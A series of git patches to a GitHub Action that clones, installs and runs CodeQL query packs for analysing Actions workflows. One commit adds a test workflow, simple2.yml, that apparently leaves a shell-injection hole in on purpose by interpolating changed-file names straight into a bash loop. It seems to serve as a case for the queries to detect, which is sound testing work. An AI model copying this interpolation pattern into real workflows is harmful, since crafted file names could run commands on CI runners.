(data) => { + output += data.toString(); + }, + }, + }; + await new toolrunner.ToolRunner(bin, args, options).exec(); + core.debug(`Finished running command :: ${bin} ${args.join(" ")}`); + return output.trim(); +} +exports.runCommand = runCommand; +async function runCommandJson(config, args) { + return JSON.parse(await runCommand(config, args)); +} +exports.runCommandJson = runCommandJson; +async function clonePackRepo(gh) { + try { + await runCommand(gh, ["repo", "clone", "GitHubSecurityLab/codeql-actions"]); + return true; + } + catch (error) { + core.warning("Failed to clone pack from GitHub..."); + } + return false; +} +exports.clonePackRepo = clonePackRepo; + + /***/ }), /***/ 6144: @@ -28751,12 +28824,17 @@ exports.run = void 0; const path = __importStar(__nccwpck_require__(1017)); const core = __importStar(__nccwpck_require__(2186)); const cql = __importStar(__nccwpck_require__(950)); +const gh = __importStar(__nccwpck_require__(1772)); /** * The main function for the action. * @returns {Promise} Resolves when the action is complete. */ async function run() { try { + // set up gh + var ghc = await gh.newGHConfig(); + core.debug(`GH CLI found at '${ghc.path}'`); + await gh.runCommand(ghc, ["version"]); // set up codeql var codeql = await cql.newCodeQL(); core.debug(`CodeQL CLI found at '${codeql.path}'`); @@ -28774,10 +28852,13 @@ async function run() { } // download pack core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - var pack_downloaded = await cql.downloadPack(codeql); + //var pack_downloaded = await cql.downloadPack(codeql); + var pack_downloaded = await gh.clonePackRepo(ghc); if (pack_downloaded === false) { var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); + core.info(`Pack path: '${action_path}'`); codeql.pack = path.join(action_path, "ql", "src"); + core.info(`Codeql pack path: '${codeql.path}'`); core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); } else { diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 3826737a082..85d7e33954d 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -3,7 +3,6 @@ import * as path from "path"; import * as core from "@actions/core"; import * as toolcache from "@actions/tool-cache"; -import * as github from "@actions/github"; import * as toolrunner from "@actions/exec/lib/toolrunner"; export interface CodeQLConfig { diff --git a/.github/action/src/gh.ts b/.github/action/src/gh.ts new file mode 100644 index 00000000000..4a8fc09ff9c --- /dev/null +++ b/.github/action/src/gh.ts @@ -0,0 +1,54 @@ +import * as fs from "fs"; +import * as path from "path"; + +import * as core from "@actions/core"; +import * as toolcache from "@actions/tool-cache"; +import * as toolrunner from "@actions/exec/lib/toolrunner"; + +export interface GHConfig { + // The path to the codeql bundle. + path: string; +} + +export async function newGHConfig(): Promise { + return { + path: "", + }; +} + +export async function runCommand( + config: GHConfig, + args: string[], +): Promise { + var bin = path.join(config.path, "gh"); + let output = ""; + var options = { + listeners: { + stdout: (data: Buffer) => { + output += data.toString(); + }, + }, + }; + + await new toolrunner.ToolRunner(bin, args, options).exec(); + core.debug(`Finished running command :: ${bin} ${args.join(" ")}`); + + return output.trim(); +} + +export async function runCommandJson( + config: GHConfig, + args: string[], +): Promise { + return JSON.parse(await runCommand(config, args)); +} + +export async function clonePackRepo(gh: GHConfig): Promise { + try { + await runCommand(gh, ["repo", "clone", "GitHubSecurityLab/codeql-actions"]); + return true; + } catch (error) { + core.warning("Failed to clone pack from GitHub..."); + } + return false; +} diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts index b1a4fc80c64..99b9d044d8f 100644 --- a/.github/action/src/index.ts +++ b/.github/action/src/index.ts @@ -1,6 +1,7 @@ import * as path from "path"; import * as core from "@actions/core"; import * as cql from "./codeql"; +import * as gh from "./gh"; /** * The main function for the action. @@ -8,6 +9,13 @@ import * as cql from "./codeql"; */ export async function run(): Promise { try { + // set up gh + var ghc = await gh.newGHConfig(); + + core.debug(`GH CLI found at '${ghc.path}'`); + + await gh.runCommand(ghc, ["version"]); + // set up codeql var codeql = await cql.newCodeQL(); @@ -30,11 +38,14 @@ export async function run(): Promise { // download pack core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - var pack_downloaded = await cql.downloadPack(codeql); + //var pack_downloaded = await cql.downloadPack(codeql); + var pack_downloaded = await gh.clonePackRepo(ghc); if (pack_downloaded === false) { var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); + core.info(`Pack path: '${action_path}'`); codeql.pack = path.join(action_path, "ql", "src"); + core.info(`Codeql pack path: '${codeql.path}'`); core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); } else { From e2699c31f8dd9871dd62dafa632ad19f246d0ccf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 13:56:58 +0100 Subject: [PATCH 0041/1267] feat(action): clone and install local packs --- .github/action/dist/index.js | 35 ++++++++++++++++++++++++++++++----- .github/action/src/codeql.ts | 21 +++++++++++++++++++++ .github/action/src/gh.ts | 12 ++++++++++-- .github/action/src/index.ts | 5 ++++- 4 files changed, 65 insertions(+), 8 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 9c0a19375f4..eb691f27095 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28596,7 +28596,7 @@ var __importStar = (this && this.__importStar) || function (mod) { return result; }; Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.codeqlDatabaseAnalyze = exports.codeqlDatabaseCreate = exports.downloadPack = exports.runCommandJson = exports.runCommand = exports.newCodeQL = void 0; +exports.codeqlDatabaseAnalyze = exports.codeqlDatabaseCreate = exports.installPack = exports.downloadPack = exports.runCommandJson = exports.runCommand = exports.newCodeQL = void 0; const fs = __importStar(__nccwpck_require__(7147)); const path = __importStar(__nccwpck_require__(1017)); const core = __importStar(__nccwpck_require__(2186)); @@ -28613,10 +28613,15 @@ async function newCodeQL() { }; } exports.newCodeQL = newCodeQL; -async function runCommand(config, args) { +async function runCommand(config, args, cwd) { var bin = path.join(config.path, "codeql"); let output = ""; + var _cwd = process.cwd(); + if (cwd) { + _cwd = cwd; + } var options = { + cwd: cwd, listeners: { stdout: (data) => { output += data.toString(); @@ -28669,6 +28674,19 @@ async function downloadPack(codeql) { return false; } exports.downloadPack = downloadPack; +async function installPack(codeql, path) { + try { + await runCommand(codeql, ["pack", "install"], path); + await runCommand(codeql, ["pack", "install"], path); + return true; + } + catch (error) { + core.warning("Failed to install local packs ..."); + } + core.info("Installed local packs ..."); + return false; +} +exports.installPack = installPack; async function codeqlDatabaseCreate(codeql) { // get runner temp directory for database var temp = process.env["RUNNER_TEMP"]; @@ -28776,9 +28794,14 @@ async function runCommandJson(config, args) { return JSON.parse(await runCommand(config, args)); } exports.runCommandJson = runCommandJson; -async function clonePackRepo(gh) { +async function clonePackRepo(gh, path) { try { - await runCommand(gh, ["repo", "clone", "GitHubSecurityLab/codeql-actions"]); + await runCommand(gh, [ + "repo", + "clone", + "GitHubSecurityLab/codeql-actions", + path, + ]); return true; } catch (error) { @@ -28853,7 +28876,9 @@ async function run() { // download pack core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); //var pack_downloaded = await cql.downloadPack(codeql); - var pack_downloaded = await gh.clonePackRepo(ghc); + let pack_path = "/tmp/codeql-actions"; + var pack_downloaded = await gh.clonePackRepo(ghc, pack_path); + await cql.installPack(codeql, pack_path); if (pack_downloaded === false) { var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); core.info(`Pack path: '${action_path}'`); diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 85d7e33954d..906e7876f66 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -34,10 +34,16 @@ export async function newCodeQL(): Promise { export async function runCommand( config: CodeQLConfig, args: string[], + cwd?: string, ): Promise { var bin = path.join(config.path, "codeql"); let output = ""; + var _cwd: string = process.cwd(); + if (cwd) { + _cwd = cwd; + } var options = { + cwd: cwd, listeners: { stdout: (data: Buffer) => { output += data.toString(); @@ -99,6 +105,21 @@ export async function downloadPack(codeql: CodeQLConfig): Promise { return false; } +export async function installPack( + codeql: CodeQLConfig, + path: string, +): Promise { + try { + await runCommand(codeql, ["pack", "install"], path); + await runCommand(codeql, ["pack", "install"], path); + return true; + } catch (error) { + core.warning("Failed to install local packs ..."); + } + core.info("Installed local packs ..."); + return false; +} + export async function codeqlDatabaseCreate( codeql: CodeQLConfig, ): Promise { diff --git a/.github/action/src/gh.ts b/.github/action/src/gh.ts index 4a8fc09ff9c..a80f4b4f59c 100644 --- a/.github/action/src/gh.ts +++ b/.github/action/src/gh.ts @@ -43,9 +43,17 @@ export async function runCommandJson( return JSON.parse(await runCommand(config, args)); } -export async function clonePackRepo(gh: GHConfig): Promise { +export async function clonePackRepo( + gh: GHConfig, + path: string, +): Promise { try { - await runCommand(gh, ["repo", "clone", "GitHubSecurityLab/codeql-actions"]); + await runCommand(gh, [ + "repo", + "clone", + "GitHubSecurityLab/codeql-actions", + path, + ]); return true; } catch (error) { core.warning("Failed to clone pack from GitHub..."); diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts index 99b9d044d8f..24daf06f537 100644 --- a/.github/action/src/index.ts +++ b/.github/action/src/index.ts @@ -39,7 +39,10 @@ export async function run(): Promise { // download pack core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); //var pack_downloaded = await cql.downloadPack(codeql); - var pack_downloaded = await gh.clonePackRepo(ghc); + + let pack_path = "/tmp/codeql-actions"; + var pack_downloaded = await gh.clonePackRepo(ghc, pack_path); + await cql.installPack(codeql, pack_path); if (pack_downloaded === false) { var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); From c58c4e0d54c19514f172ed1787624c44b9888fbd Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:06:46 +0100 Subject: [PATCH 0042/1267] feat(actions): refactor as composite action to be able to pass env vars --- .github/action/dist/index.js | 4 ++-- .github/action/src/codeql.ts | 1 - .github/action/src/gh.ts | 2 +- action.yml | 15 +++++++++++++-- 4 files changed, 16 insertions(+), 6 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index eb691f27095..49c02951414 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28678,12 +28678,12 @@ async function installPack(codeql, path) { try { await runCommand(codeql, ["pack", "install"], path); await runCommand(codeql, ["pack", "install"], path); + core.info("Installed local packs ..."); return true; } catch (error) { core.warning("Failed to install local packs ..."); } - core.info("Installed local packs ..."); return false; } exports.installPack = installPack; @@ -30815,4 +30815,4 @@ module.exports = parseParams /******/ module.exports = __webpack_exports__; /******/ /******/ })() -; \ No newline at end of file +; diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 906e7876f66..38c222cb2a5 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -116,7 +116,6 @@ export async function installPack( } catch (error) { core.warning("Failed to install local packs ..."); } - core.info("Installed local packs ..."); return false; } diff --git a/.github/action/src/gh.ts b/.github/action/src/gh.ts index a80f4b4f59c..a4e187053be 100644 --- a/.github/action/src/gh.ts +++ b/.github/action/src/gh.ts @@ -12,7 +12,7 @@ export interface GHConfig { export async function newGHConfig(): Promise { return { - path: "", + path: "/usr/bin/", }; } diff --git a/action.yml b/action.yml index 03054c195be..976e35d8f7c 100644 --- a/action.yml +++ b/action.yml @@ -14,6 +14,17 @@ inputs: description: "SARIF File Output" default: "codeql-actions.sarif" +# runs: +# using: "node16" +# main: ".github/action/dist/index.js" + runs: - using: "node16" - main: ".github/action/dist/index.js" + using: 'composite' + steps: + - name: Do something with context + shell: bash + env: + GH_TOKEN: ${{ github.token }} + run: | + node .github/action/dist/index.js + node ${{ github.action_path }}/.github/action/dist/index.js From e9f30062046c6adbfe8b72ccc6b4b9ad95ac3729 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:10:52 +0100 Subject: [PATCH 0043/1267] fix(actions): pass the qlpack dirs --- .github/action/src/codeql.ts | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 38c222cb2a5..1f604f9c89a 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -107,11 +107,11 @@ export async function downloadPack(codeql: CodeQLConfig): Promise { export async function installPack( codeql: CodeQLConfig, - path: string, + dir: string, ): Promise { try { - await runCommand(codeql, ["pack", "install"], path); - await runCommand(codeql, ["pack", "install"], path); + await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); + await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } catch (error) { core.warning("Failed to install local packs ..."); From a94793fc0996065c3deb0fccf3534c684c45c333 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:14:53 +0100 Subject: [PATCH 0044/1267] fix(actions): pass the qlpack dirs --- .github/action/src/codeql.ts | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 1f604f9c89a..7cb1dab48e5 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -34,14 +34,15 @@ export async function newCodeQL(): Promise { export async function runCommand( config: CodeQLConfig, args: string[], - cwd?: string, + cwd_arg?: string, ): Promise { var bin = path.join(config.path, "codeql"); let output = ""; - var _cwd: string = process.cwd(); - if (cwd) { - _cwd = cwd; + var cwd: string = process.cwd(); + if (cwd_arg) { + cwd = cwd_arg; } + core.info("Current working directory: " + cwd); var options = { cwd: cwd, listeners: { From 04a2ae9ad34bd3b1bf12b84e596f53bf186326b1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:29:03 +0100 Subject: [PATCH 0045/1267] fix(actions): ql pack installation --- .github/action/src/gh.ts | 3 --- .github/action/src/index.ts | 31 ++++++++++++++++++------------- 2 files changed, 18 insertions(+), 16 deletions(-) diff --git a/.github/action/src/gh.ts b/.github/action/src/gh.ts index a4e187053be..668e559e40b 100644 --- a/.github/action/src/gh.ts +++ b/.github/action/src/gh.ts @@ -1,8 +1,5 @@ -import * as fs from "fs"; import * as path from "path"; - import * as core from "@actions/core"; -import * as toolcache from "@actions/tool-cache"; import * as toolrunner from "@actions/exec/lib/toolrunner"; export interface GHConfig { diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts index 24daf06f537..aea847298b4 100644 --- a/.github/action/src/index.ts +++ b/.github/action/src/index.ts @@ -37,24 +37,29 @@ export async function run(): Promise { } // download pack - core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - //var pack_downloaded = await cql.downloadPack(codeql); + // core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); + // var pack_downloaded = await cql.downloadPack(codeql); + core.info(`Cloning CodeQL Actions pack into '${codeql.pack}'`); let pack_path = "/tmp/codeql-actions"; - var pack_downloaded = await gh.clonePackRepo(ghc, pack_path); - await cql.installPack(codeql, pack_path); + var pack_cloned = await gh.clonePackRepo(ghc, pack_path); + core.info(`Cloned CodeQL Actions pack into '${pack_path}'`); - if (pack_downloaded === false) { - var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); - core.info(`Pack path: '${action_path}'`); - codeql.pack = path.join(action_path, "ql", "src"); - core.info(`Codeql pack path: '${codeql.path}'`); - - core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); - } else { - core.info(`Pack downloaded '${codeql.pack}'`); + if (pack_cloned === false) { + throw new Error("Could not clone the actions ql pack"); } + core.info(`Installing CodeQL Actions packs from '${pack_path}'`); + var pack_installed = await cql.installPack(codeql, pack_path); + + if (pack_installed === false) { + throw new Error("Could not install the actions ql packs"); + } + + core.info(`Pack path: '${pack_path}'`); + codeql.pack = path.join(pack_path, "ql", "src"); + core.info(`Codeql Queries pack path: '${codeql.pack}'`); + core.info("Creating CodeQL database..."); var database_path = await cql.codeqlDatabaseCreate(codeql); From b11d8dad4905269e6023ae20cfbac501638ef755 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:31:07 +0100 Subject: [PATCH 0046/1267] fix(actions): ql pack installation --- .github/action/dist/index.js | 46 +++++++++++++++++++----------------- 1 file changed, 24 insertions(+), 22 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 49c02951414..3d69e1f81ce 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28613,13 +28613,14 @@ async function newCodeQL() { }; } exports.newCodeQL = newCodeQL; -async function runCommand(config, args, cwd) { +async function runCommand(config, args, cwd_arg) { var bin = path.join(config.path, "codeql"); let output = ""; - var _cwd = process.cwd(); - if (cwd) { - _cwd = cwd; + var cwd = process.cwd(); + if (cwd_arg) { + cwd = cwd_arg; } + core.info("Current working directory: " + cwd); var options = { cwd: cwd, listeners: { @@ -28674,11 +28675,10 @@ async function downloadPack(codeql) { return false; } exports.downloadPack = downloadPack; -async function installPack(codeql, path) { +async function installPack(codeql, dir) { try { - await runCommand(codeql, ["pack", "install"], path); - await runCommand(codeql, ["pack", "install"], path); - core.info("Installed local packs ..."); + await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); + await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } catch (error) { @@ -28771,7 +28771,7 @@ const core = __importStar(__nccwpck_require__(2186)); const toolrunner = __importStar(__nccwpck_require__(8159)); async function newGHConfig() { return { - path: "", + path: "/usr/bin/", }; } exports.newGHConfig = newGHConfig; @@ -28874,21 +28874,23 @@ async function run() { throw new Error("CodeQL Yaml extractor not installed"); } // download pack - core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - //var pack_downloaded = await cql.downloadPack(codeql); + // core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); + // var pack_downloaded = await cql.downloadPack(codeql); + core.info(`Cloning CodeQL Actions pack into '${codeql.pack}'`); let pack_path = "/tmp/codeql-actions"; - var pack_downloaded = await gh.clonePackRepo(ghc, pack_path); - await cql.installPack(codeql, pack_path); - if (pack_downloaded === false) { - var action_path = path.resolve(path.join(__dirname, "..", "..", "..")); - core.info(`Pack path: '${action_path}'`); - codeql.pack = path.join(action_path, "ql", "src"); - core.info(`Codeql pack path: '${codeql.path}'`); - core.info(`Pack defaulting back to local pack: '${codeql.pack}'`); + var pack_cloned = await gh.clonePackRepo(ghc, pack_path); + core.info(`Cloned CodeQL Actions pack into '${pack_path}'`); + if (pack_cloned === false) { + throw new Error("Could not clone the actions ql pack"); } - else { - core.info(`Pack downloaded '${codeql.pack}'`); + core.info(`Installing CodeQL Actions packs from '${pack_path}'`); + var pack_installed = await cql.installPack(codeql, pack_path); + if (pack_installed === false) { + throw new Error("Could not install the actions ql packs"); } + core.info(`Pack path: '${pack_path}'`); + codeql.pack = path.join(pack_path, "ql", "src"); + core.info(`Codeql Queries pack path: '${codeql.pack}'`); core.info("Creating CodeQL database..."); var database_path = await cql.codeqlDatabaseCreate(codeql); core.info("Running CodeQL analysis..."); @@ -30815,4 +30817,4 @@ module.exports = parseParams /******/ module.exports = __webpack_exports__; /******/ /******/ })() -; +; \ No newline at end of file From 41639dd0e2707f39c2084a5b1c5d1914161dd401 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:37:43 +0100 Subject: [PATCH 0047/1267] fix(actions): ql pack installation --- .github/action/dist/index.js | 3 --- .github/action/src/index.ts | 4 ---- 2 files changed, 7 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index 3d69e1f81ce..c482d87b4f2 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28873,9 +28873,6 @@ async function run() { core.setFailed("CodeQL Yaml extractor not installed"); throw new Error("CodeQL Yaml extractor not installed"); } - // download pack - // core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - // var pack_downloaded = await cql.downloadPack(codeql); core.info(`Cloning CodeQL Actions pack into '${codeql.pack}'`); let pack_path = "/tmp/codeql-actions"; var pack_cloned = await gh.clonePackRepo(ghc, pack_path); diff --git a/.github/action/src/index.ts b/.github/action/src/index.ts index aea847298b4..717782b555c 100644 --- a/.github/action/src/index.ts +++ b/.github/action/src/index.ts @@ -36,10 +36,6 @@ export async function run(): Promise { throw new Error("CodeQL Yaml extractor not installed"); } - // download pack - // core.info(`Downloading CodeQL Actions pack '${codeql.pack}'`); - // var pack_downloaded = await cql.downloadPack(codeql); - core.info(`Cloning CodeQL Actions pack into '${codeql.pack}'`); let pack_path = "/tmp/codeql-actions"; var pack_cloned = await gh.clonePackRepo(ghc, pack_path); From b3bab160d2a0e0a07dfdbe757d15cb5de8c19666 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:41:21 +0100 Subject: [PATCH 0048/1267] fix(actions): ql pack installation --- .github/action/src/codeql.ts | 2 ++ action.yml | 1 - 2 files changed, 2 insertions(+), 1 deletion(-) diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 7cb1dab48e5..b999b698d14 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -111,7 +111,9 @@ export async function installPack( dir: string, ): Promise { try { + await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/lib")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); + await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/src")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } catch (error) { diff --git a/action.yml b/action.yml index 976e35d8f7c..ed6eb327a9e 100644 --- a/action.yml +++ b/action.yml @@ -26,5 +26,4 @@ runs: env: GH_TOKEN: ${{ github.token }} run: | - node .github/action/dist/index.js node ${{ github.action_path }}/.github/action/dist/index.js From 13c5ec07b45eb0eb4a7791df5ead19ee4e48aa94 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:41:47 +0100 Subject: [PATCH 0049/1267] fix(actions): ql pack installation --- .github/action/dist/index.js | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index c482d87b4f2..b2e5a97f67f 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28677,7 +28677,9 @@ async function downloadPack(codeql) { exports.downloadPack = downloadPack; async function installPack(codeql, dir) { try { + await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/lib")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); + await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/src")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } From 003b8cc8c0f127ee8903484217318fc8d80cdd86 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:44:47 +0100 Subject: [PATCH 0050/1267] fix(actions): ql pack installation --- .github/action/dist/index.js | 4 ++-- .github/action/src/codeql.ts | 12 ++++++++++-- 2 files changed, 12 insertions(+), 4 deletions(-) diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index b2e5a97f67f..a778f7d0620 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28677,9 +28677,9 @@ async function downloadPack(codeql) { exports.downloadPack = downloadPack; async function installPack(codeql, dir) { try { - await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/lib")); + await runCommand(codeql, ["pack", "download", "githubsecuritylab/actions-all"], path.join(dir, "/ql/lib")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); - await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/src")); + await runCommand(codeql, ["pack", "download", "githubsecuritylab/actions-queries"], path.join(dir, "/ql/src")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index b999b698d14..790eff6eadc 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -111,9 +111,17 @@ export async function installPack( dir: string, ): Promise { try { - await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/lib")); + await runCommand( + codeql, + ["pack", "download", "githubsecuritylab/actions-all"], + path.join(dir, "/ql/lib"), + ); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); - await runCommand(codeql, ["pack", "download"], path.join(dir, "/ql/src")); + await runCommand( + codeql, + ["pack", "download", "githubsecuritylab/actions-queries"], + path.join(dir, "/ql/src"), + ); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } catch (error) { From 8e59fb7558e985661fafe122627e12ba1f16e84c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 14:47:34 +0100 Subject: [PATCH 0051/1267] fix(actions): ql pack installation --- .github/action/dist/index.js | 2 -- .github/action/src/codeql.ts | 10 --------- .github/workflows/simple2.yml | 42 +++++++++++++++++++++++++++++++++++ 3 files changed, 42 insertions(+), 12 deletions(-) create mode 100644 .github/workflows/simple2.yml diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index a778f7d0620..c482d87b4f2 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28677,9 +28677,7 @@ async function downloadPack(codeql) { exports.downloadPack = downloadPack; async function installPack(codeql, dir) { try { - await runCommand(codeql, ["pack", "download", "githubsecuritylab/actions-all"], path.join(dir, "/ql/lib")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); - await runCommand(codeql, ["pack", "download", "githubsecuritylab/actions-queries"], path.join(dir, "/ql/src")); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } diff --git a/.github/action/src/codeql.ts b/.github/action/src/codeql.ts index 790eff6eadc..7cb1dab48e5 100644 --- a/.github/action/src/codeql.ts +++ b/.github/action/src/codeql.ts @@ -111,17 +111,7 @@ export async function installPack( dir: string, ): Promise { try { - await runCommand( - codeql, - ["pack", "download", "githubsecuritylab/actions-all"], - path.join(dir, "/ql/lib"), - ); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); - await runCommand( - codeql, - ["pack", "download", "githubsecuritylab/actions-queries"], - path.join(dir, "/ql/src"), - ); await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); return true; } catch (error) { diff --git a/.github/workflows/simple2.yml b/.github/workflows/simple2.yml new file mode 100644 index 00000000000..b40f5eb6ac0 --- /dev/null +++ b/.github/workflows/simple2.yml @@ -0,0 +1,42 @@ +name: CI + +on: + pull_request: + branches: + - main + +jobs: + changed_files: + runs-on: ubuntu-latest + name: Test changed-files + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + - name: List all changed files + id: sink + run: | + for file in ${{ steps.step.outputs.value }}; do + echo "$file was changed" + done + + - name: List all changed files + id: no-flow + run: | + for file in ${{ steps.source.outputs.all_changed_files_count }}; do + echo "$file was changed" + done + From 76f245b337149f09bbc1bbacad7f7cd23010452b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 16 Feb 2024 15:34:20 +0100 Subject: [PATCH 0052/1267] feat(actions): use published actions packs --- .github/action/dist/index.js | 119 +++-------------------------- .github/action/src/codeql.ts | 14 ---- .github/action/src/gh.ts | 59 -------------- .github/action/src/index.ts | 35 +++------ .github/workflows/build.yml | 4 +- ql/lib/codeql/actions/DataFlow.qll | 9 ++- 6 files changed, 26 insertions(+), 214 deletions(-) delete mode 100644 .github/action/src/gh.ts diff --git a/.github/action/dist/index.js b/.github/action/dist/index.js index c482d87b4f2..501ce250969 100644 --- a/.github/action/dist/index.js +++ b/.github/action/dist/index.js @@ -28596,7 +28596,7 @@ var __importStar = (this && this.__importStar) || function (mod) { return result; }; Object.defineProperty(exports, "__esModule", ({ value: true })); -exports.codeqlDatabaseAnalyze = exports.codeqlDatabaseCreate = exports.installPack = exports.downloadPack = exports.runCommandJson = exports.runCommand = exports.newCodeQL = void 0; +exports.codeqlDatabaseAnalyze = exports.codeqlDatabaseCreate = exports.downloadPack = exports.runCommandJson = exports.runCommand = exports.newCodeQL = void 0; const fs = __importStar(__nccwpck_require__(7147)); const path = __importStar(__nccwpck_require__(1017)); const core = __importStar(__nccwpck_require__(2186)); @@ -28675,18 +28675,6 @@ async function downloadPack(codeql) { return false; } exports.downloadPack = downloadPack; -async function installPack(codeql, dir) { - try { - await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/lib")); - await runCommand(codeql, ["pack", "install"], path.join(dir, "/ql/src")); - return true; - } - catch (error) { - core.warning("Failed to install local packs ..."); - } - return false; -} -exports.installPack = installPack; async function codeqlDatabaseCreate(codeql) { // get runner temp directory for database var temp = process.env["RUNNER_TEMP"]; @@ -28734,84 +28722,6 @@ async function codeqlDatabaseAnalyze(codeql, database_path) { exports.codeqlDatabaseAnalyze = codeqlDatabaseAnalyze; -/***/ }), - -/***/ 1772: -/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { - -"use strict"; - -var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { - if (k2 === undefined) k2 = k; - var desc = Object.getOwnPropertyDescriptor(m, k); - if (!desc || 